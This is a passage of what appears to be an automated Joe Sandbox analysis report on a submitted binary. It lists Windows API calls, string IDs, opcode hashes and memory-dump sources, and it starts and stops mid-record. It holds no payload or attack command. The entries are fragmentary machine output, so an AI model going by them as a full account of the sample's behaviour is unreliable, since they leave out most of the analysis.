                                                                        • _memset.LIBCMT ref: 00EC5190
                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00EC51C6
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CrackInternet_memset
                                                                        • String ID: |$D
                                                                        • API String ID: 1413715105-465884809
                                                                        • Opcode ID: 49d1c739e1d182ca42f64947070a0f5844664dbdff04515372022d61b60685db
                                                                        • Instruction ID: d53595a93dd512a4c33621ddda064d57fb236abd6c5ef57181f1ecc639feeeef
                                                                        • Opcode Fuzzy Hash: 49d1c739e1d182ca42f64947070a0f5844664dbdff04515372022d61b60685db
                                                                        • Instruction Fuzzy Hash: 67313972800109ABCF01AFE4CC45EEE7FB9FF18704F105019E809B6166DB31AA46CBA0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EDA15E
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EDA172
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EDA196
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        • Opcode ID: f89b1d8f01ef78371a9426d688ab615ea8ab79089f127dac686c8e3f793d6500
                                                                        • Instruction ID: 5255000a88f92dcdd2a0a4c5f50b9f160bcd05149aed72f4f0209aa965bec87f
                                                                        • Opcode Fuzzy Hash: f89b1d8f01ef78371a9426d688ab615ea8ab79089f127dac686c8e3f793d6500
                                                                        • Instruction Fuzzy Hash: 9021F372100218ABDF119F94CC42FEA3B7AFF48724F041114FA55BB2D0D6B1AC51CB90
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EDA941
                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EDA94F
                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EDA956
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 4014797782-2298589950
                                                                        • Opcode ID: fa4f5c55620c08db9082f9704a599c2c6349d4a75259d426a81c3a6d22d55a78
                                                                        • Instruction ID: 0d05e7b935b6b3bdbbe7b91dbb596187e6021a273529fb1062e17e4368ddcec5
                                                                        • Opcode Fuzzy Hash: fa4f5c55620c08db9082f9704a599c2c6349d4a75259d426a81c3a6d22d55a78
                                                                        • Instruction Fuzzy Hash: CE21A4B5600209AFDB10EF54DC92D7737ADEF9A368B051059FA04AB361CB30EC12DB61
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00ED9A30
                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00ED9A40
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00ED9A65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$MoveWindow
                                                                        • String ID: Listbox
                                                                        • API String ID: 3315199576-2633736733
                                                                        • Opcode ID: 512c92d4e7680a03f6aaf0ed5cc6c75d2753c51d424c9aea3f5b83cd79ac8ccd
                                                                        • Instruction ID: c9d841d1babeb3b2b4637436baa452665f20bab937a4c0fbcb12d74b40a96bfa
                                                                        • Opcode Fuzzy Hash: 512c92d4e7680a03f6aaf0ed5cc6c75d2753c51d424c9aea3f5b83cd79ac8ccd
                                                                        • Instruction Fuzzy Hash: D221C532610118BFDB118F54CC85EBF3BAAEF89764F019129F944AB2A1C6719C12D7A0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EDA46D
                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EDA482
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EDA48F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
                                                                        • Opcode ID: 293dc73121d9c796e430ecf0f00b7f229b6b5b3868364ec7aac4825eb30b3183
                                                                        • Instruction ID: b75c8087939ff2a957b09a25e6808009361d369a66acabf9f20b001e74cd1bec
                                                                        • Opcode Fuzzy Hash: 293dc73121d9c796e430ecf0f00b7f229b6b5b3868364ec7aac4825eb30b3183
                                                                        • Instruction Fuzzy Hash: 9C11EB71100208BEDF205F65CC49FAB3769EF88768F054129FA55A61D1D6B1E812DB10
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E92350,?), ref: 00E922A1
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E922A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RoInitialize$combase.dll
                                                                        • API String ID: 2574300362-340411864
                                                                        • Opcode ID: a04202f9c6b718e1155f994e5f39968e45ad6265bc74c04303fcfb240ed32d84
                                                                        • Instruction ID: 40b2dbe4b5db003069e11a6388030055382bb90f7531c902be48279d77a73e8d
                                                                        • Opcode Fuzzy Hash: a04202f9c6b718e1155f994e5f39968e45ad6265bc74c04303fcfb240ed32d84
                                                                        • Instruction Fuzzy Hash: 17E01A70698308ABDF20AF71EC49B243A6AA741716F1050A5B202E50B0DFB54055EF08
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E92276), ref: 00E92376
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E9237D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RoUninitialize$combase.dll
                                                                        • API String ID: 2574300362-2819208100
                                                                        • Opcode ID: 893728ee2868be635f8684c50b6633dabb8d7e059b895415dea03467dcbc6b9c
                                                                        • Instruction ID: 66b8a65b111f4dd1ffef785720d396bb51a180875bf35d555aa77dd4103f3251
                                                                        • Opcode Fuzzy Hash: 893728ee2868be635f8684c50b6633dabb8d7e059b895415dea03467dcbc6b9c
                                                                        • Instruction Fuzzy Hash: 7CE0BD70689309AFEB20AF61ED1DB243A76B740716F101429F209F20B0CBB89424FA15
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime__swprintf
                                                                        • String ID: %.3d$WIN_XPe
                                                                        • API String ID: 2070861257-2409531811
                                                                        • Opcode ID: 9cffc0ce124c586ed90929a52ba485ddc70b2f8727e351e52e41d830db82bcac
                                                                        • Instruction ID: 8017ac217e03d9c57757df78eab8572d070a734cf06bb296b7e5c402637bcfe1
                                                                        • Opcode Fuzzy Hash: 9cffc0ce124c586ed90929a52ba485ddc70b2f8727e351e52e41d830db82bcac
                                                                        • Instruction Fuzzy Hash: 9EE0EC7180865DDBCA1197929D059F9B3BCAB04741F2824E6B90AB1050E675AB84AB13
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00E742EC,?,00E742AA,?), ref: 00E74304
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E74316
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-1355242751
                                                                        • Opcode ID: 3fc43c0eeb502421b28e4566979a87bc0a61f2db267814609b26a891e1248266
                                                                        • Instruction ID: 83b3a904fe61b24788e9c2c5ea6fadf3671342bbd28087148dad361c0c681c08
                                                                        • Opcode Fuzzy Hash: 3fc43c0eeb502421b28e4566979a87bc0a61f2db267814609b26a891e1248266
                                                                        • Instruction Fuzzy Hash: 79D0A7F0404F22FFD7204F21FC0C6117AD5AF04305B008419E549F21A0E7B0C884D611
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00ED21FB,?,00ED23EF), ref: 00ED2213
                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00ED2225
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetProcessId$kernel32.dll
                                                                        • API String ID: 2574300362-399901964
                                                                        • Opcode ID: ea7318cf91c0fbc923e2bab25656b86e3e7311eddcdd569c0dd93a4dd8850403
                                                                        • Instruction ID: c214febd20171bb97e8ab597e2e83fea8cb74c9ca9c1062e69297d26f3d746bb
                                                                        • Opcode Fuzzy Hash: ea7318cf91c0fbc923e2bab25656b86e3e7311eddcdd569c0dd93a4dd8850403
                                                                        • Instruction Fuzzy Hash: EBD0A7344047229FC7214F31FD086117AD5EF14314B00541EF895F2260E7B0D884EA51
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00E741BB,00E74341,?,00E7422F,?,00E741BB,?,?,?,?,00E739FE,?,00000001), ref: 00E74359
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E7436B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-3689287502
                                                                        • Opcode ID: d7e9a73e2b31b4192958eed313fa93fdaf2ce9c346c686a637bb7b0956b4df2a
                                                                        • Instruction ID: 707568a11e9b50dbb7bb14c16f12f3eff9c94d257574540f602344ff71a95cb9
                                                                        • Opcode Fuzzy Hash: d7e9a73e2b31b4192958eed313fa93fdaf2ce9c346c686a637bb7b0956b4df2a
                                                                        • Instruction Fuzzy Hash: 15D0A7B0444722BFD7214F31FC486117AD5AF10719B018519E489F2190E7B0D984D611
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00EB052F,?,00EB06D7), ref: 00EB0572
                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00EB0584
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                        • API String ID: 2574300362-1587604923
                                                                        • Opcode ID: 80bdd255dd6835e32521044d63d7f3564537983e7f5a8632d2c4bc67c97135a7
                                                                        • Instruction ID: fe54cd8182e9aa5b352af7ba25af3185a74290040ef925fa4bf4713122198fc3
                                                                        • Opcode Fuzzy Hash: 80bdd255dd6835e32521044d63d7f3564537983e7f5a8632d2c4bc67c97135a7
                                                                        • Instruction Fuzzy Hash: 8ED05E70505322AED7309F21BC08A577BE4AB04304B108419E841A2550E670D484CA21
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00EB051D,?,00EB05FE), ref: 00EB0547
                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00EB0559
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                        • API String ID: 2574300362-1071820185
                                                                        • Opcode ID: c4e49b2093c361547999ab8b84afcf610951cc78f4a64b7ad913c66ea9a60eb5
                                                                        • Instruction ID: 24e7efd455d2dcac420df5313029486b4bd3a219b86f71cbb7fc43c1d4e97d93
                                                                        • Opcode Fuzzy Hash: c4e49b2093c361547999ab8b84afcf610951cc78f4a64b7ad913c66ea9a60eb5
                                                                        • Instruction Fuzzy Hash: 8ED0A730505722AFC7308F61FC086577AE4AB04305B10C41DE446F2550E670D884CA11
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00ECECBE,?,00ECEBBB), ref: 00ECECD6
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00ECECE8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                        • API String ID: 2574300362-1816364905
                                                                        • Opcode ID: 2d98311fd43d6d44645e304030dfafbe7d69143a2a1b6d059a3672e08c9040b6
                                                                        • Instruction ID: 80f06df1429bc66c63fe410354bf94dab421fb0270da469e5b2389b7e824a5ec
                                                                        • Opcode Fuzzy Hash: 2d98311fd43d6d44645e304030dfafbe7d69143a2a1b6d059a3672e08c9040b6
                                                                        • Instruction Fuzzy Hash: 0AD0A731404733AFCB245F61FD48F12BAE4AF00304B00841DFC45F2250EBB0D884E611
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00ECBAD3,00000001,00ECB6EE,?,00F0DC00), ref: 00ECBAEB
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00ECBAFD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                        • API String ID: 2574300362-199464113
                                                                        • Opcode ID: a413020f2030ee7017290c49e520ddee67ab36a8d8b612d0dd4f88953df38c7a
                                                                        • Instruction ID: 23faee88bb93180f3067b0944262455487673b4f58ab3aa05a0bfffa31d5d850
                                                                        • Opcode Fuzzy Hash: a413020f2030ee7017290c49e520ddee67ab36a8d8b612d0dd4f88953df38c7a
                                                                        • Instruction Fuzzy Hash: 61D05E70C047239EC7305F21BC49F217AD4AB00304F00441DA853A2150E7B0D884DA11
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00ED3BD1,?,00ED3E06), ref: 00ED3BE9
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00ED3BFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: f29763556825f36f3d60ea1cedfd9d69dfacebbcc454bd01735508f9129e8dbc
                                                                        • Instruction ID: daf33561c14009b56304a5bc8f1e556e150e56e5574c8619290e993bf7a59f6a
                                                                        • Opcode Fuzzy Hash: f29763556825f36f3d60ea1cedfd9d69dfacebbcc454bd01735508f9129e8dbc
                                                                        • Instruction Fuzzy Hash: 5AD0A770414722DFC7205F71FC08613FEF5EB01318B10442AE445F2250E6F0D484CE22
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f930c22cb66fd90d984ca2b6eb01136a234d1d76ed6b6f47df8dd571ea3472f
                                                                        • Instruction ID: 1f333ae3f8c06d239a550810f696fc455e84a4e5aecdc3a3cd901a7b11196d6a
                                                                        • Opcode Fuzzy Hash: 5f930c22cb66fd90d984ca2b6eb01136a234d1d76ed6b6f47df8dd571ea3472f
                                                                        • Instruction Fuzzy Hash: 96C14E75A0021AEFCB14DF94C884AAEB7B5FF89714F109598E905EF252D730EE81DB90
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 00ECAAB4
                                                                        • CoUninitialize.OLE32 ref: 00ECAABF
                                                                          • Part of subcall function 00EB0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EB027B
                                                                        • VariantInit.OLEAUT32(?), ref: 00ECAACA
                                                                        • VariantClear.OLEAUT32(?), ref: 00ECAD9D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                        • String ID:
                                                                        • API String ID: 780911581-0
                                                                        • Opcode ID: b402246a1a3577ca7f5d4209300a3473231f0356b5938885736a7fdcbd464922
                                                                        • Instruction ID: 513e34f768655a14a056dc2e479eb3cbd500ae23e50ab1fc85ed41f6dede7b9f
                                                                        • Opcode Fuzzy Hash: b402246a1a3577ca7f5d4209300a3473231f0356b5938885736a7fdcbd464922
                                                                        • Instruction Fuzzy Hash: 4DA125352046059FCB10EF14C581B5AB7E5BF88318F18945DFA9AAB3A2CB31ED45CB86
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: 314a817768d05aabfab4ded614fabb08134561b943042a61c4a3095816f1f8c9
                                                                        • Instruction ID: 129b27818ab0d8b9c2e95b9e322f9003263f8fcc708311a5493dc04883f3b025
                                                                        • Opcode Fuzzy Hash: 314a817768d05aabfab4ded614fabb08134561b943042a61c4a3095816f1f8c9
                                                                        • Instruction Fuzzy Hash: 795192306043069BDF24AF66989166EB7F5AF4E314F20A81FE55AFF2D3DB70A8448711
                                                                        APIs
                                                                        Memory Dump Source
